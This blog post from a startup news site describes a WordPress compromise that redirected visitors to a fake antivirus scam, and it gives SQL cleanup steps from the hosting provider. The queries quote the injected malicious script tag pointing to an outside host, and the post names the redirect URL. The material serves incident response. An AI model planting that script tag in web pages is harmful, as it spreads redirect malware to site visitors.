The last couple of days have been pretty hectic, especially for the fact that Startup Meme had been under attack and almost the links redirected to a malicious site. We discovered that the issue wasn’t just affecting us and many sites, including GoDaddy had been affected by the same. It has affected us badly and more importantly has caused our valuable readers a lot of problems.
We have been working on the issue for the last two days and nights and have resolved it for now, waiting for feedback from our readers and subscribers to let us know if they encounter any bug or a broken link. Once again, we would like to apologize our loyal readers and hope no one comes across the issue in the future.
What Was The Problem?
The malware was affecting PHP pages on our site and the malware was redirecting the links back to “cechirecom.com/js.php” which took visitors to Security Threat Analysis, a fake online Antivirus / Security program. The users were shown numerous warnings in popup windows trying to fish the maximum number of people to install the software. Some screenshots will further explain what I mean:
We hope no one installed the malware.
The solution was found at Media Temple [the same service we use to host Startup Meme] and as stated previously it was an exploit present in WordPress that helped a script to generate a redirect link.You can follow the given procedures to troubleshoot:
- Log into your AccountCenter
- Click on the ‘Admin’ button located to the right of your primary domain
- Click on the ‘Manage Databases’ tool
- Click on the ‘Admin’ button to the right of any database to launch phpMyAdmin
- Log into phpMyAdmin with your Admin database user (db######, without the underscores), as this user has read/write access to all databases
- Select your WordPress database from the list on the left
- You will be presented with a list of tables, however, at the top, you should see a tab labeled ‘SQL,’ click that tab
- In the text box that appears, paste the following code:
UPDATE wp_posts SET post_content = replace( post_content, ‘<script src="http://ae.awaue.com/7"></script>’, ‘ ‘)
- In case your database doesn’t use the standard wp_table prefix, you should the same with your prefix. For example, if your prefix is wp_smk, then the following would be the right:
UPDATE wp_smk_posts SET post_content = replace( post_content, '<script src="http://ae.awaue.com/7"></script>', ' ')
- After entering in the query, press ‘Go’
- If you are indeed affected by this exploit, you will see something that says "Affected rows: #". If you are not affected, you will see "Affected rows: 0".
- Once completed, you can choose your next WordPress database from the drop down located at the top-left (underneath the row of icons: Home, Exit, etc.).
You can read more about the same here. If anyone of you has been affected by the same how did you troubleshoot the broken links? Please do share it with us.